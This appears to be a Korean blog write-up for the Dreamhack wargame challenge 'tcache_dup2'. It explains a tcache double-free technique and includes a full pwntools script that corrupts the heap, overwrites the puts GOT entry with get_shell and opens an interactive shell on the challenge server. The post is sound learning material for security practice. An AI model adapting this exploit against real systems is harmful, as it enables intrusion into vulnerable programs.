tcache_dup2

🌇│System_Study/📕│Dreamhack_Hacking

tcache_dup2

Jastes 2022. 11. 6. 23:50

tcache_dup2

문제 풀이

이전이랑 보호기법도 똑같고

코드만 살짝 바뀐 모습으로 이전과 같이 실행하면 무한루프에 빠지기에
함수를 통해 p64 데이터 전송 과정에서 전송한 데이터와 다른 데이터가 찍히는 문제가 있었네요
실행해보면서 많이 막혔는데 그 부분만 수동으로 바꿔서 하면 될 듯 합니다.

Exploit 설계

다른 부분도 마찬가지고 추가적인 인자를 입력하여 확인하는 부분과 modify가 추가된 모습입니다.
하지만 그러한 부분은 idx가 8을 초과하면 안된다.. 설명은 이전 내용에서 무지 많이 했으므로
여기선 이전 코드를 활용해서 작성해볼까요? 공격기법의 접근 방식도 유사하므로..

Exploit

위에서 다 설명했으니 추가적인 부분만 간단히 설명하고 넘어가겠습니다.

이 부분은 DFB의 부분의 기본이므로 이젠 넘어갈께요

이번엔 해제를 따로 하는데 그 이유는 modify가 존재하므로 해당 함수를 활용하여 넣었습니다.
이전 코드에서 chunk를 두번만 free함으로써.. 근데 생각해보면 chunk를 두개만 free해도 충분하겠다

또한 puts가 아니고 printf, read의 got로는 접근이 안되기에 이상하다..

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35 from pwn import *
 
p=remote('host3.dreamhack.games', 17503)
e=ELF("./tcache_dup2")
 
def create(size,data):
    p.sendlineafter("> ",str(1))
    p.sendlineafter("Size: ",str(size))
    p.sendafter("Data: ",data)
 
def Modify(idx,size,data):
    p.sendlineafter("> ",str(2))
    p.sendlineafter("idx: ",str(idx))
    p.sendlineafter("Size: ",str(size))
    p.sendafter("Data: ",data)
 
def delete(idx):
    p.sendlineafter("> ",str(3))
    p.sendlineafter("idx: ",str(idx))
 
create(0x10,"AAAA")
create(0x10,"AAAA")
 
delete(0)
delete(1)
 
#why "A"*0x4으론 실행이 잘 안되서.. 0x10으로 시도했습니다
Modify(1,0x10,"A"*0x10)
delete(1)
 
create(0x10,p64(e.got['puts']))
create(0x10,"AAAA")
 
create(0x10,p64(e.symbols['get_shell']))
p.interactive() cs

참고 자료

참고 이미지

저작자표시 비영리 변경금지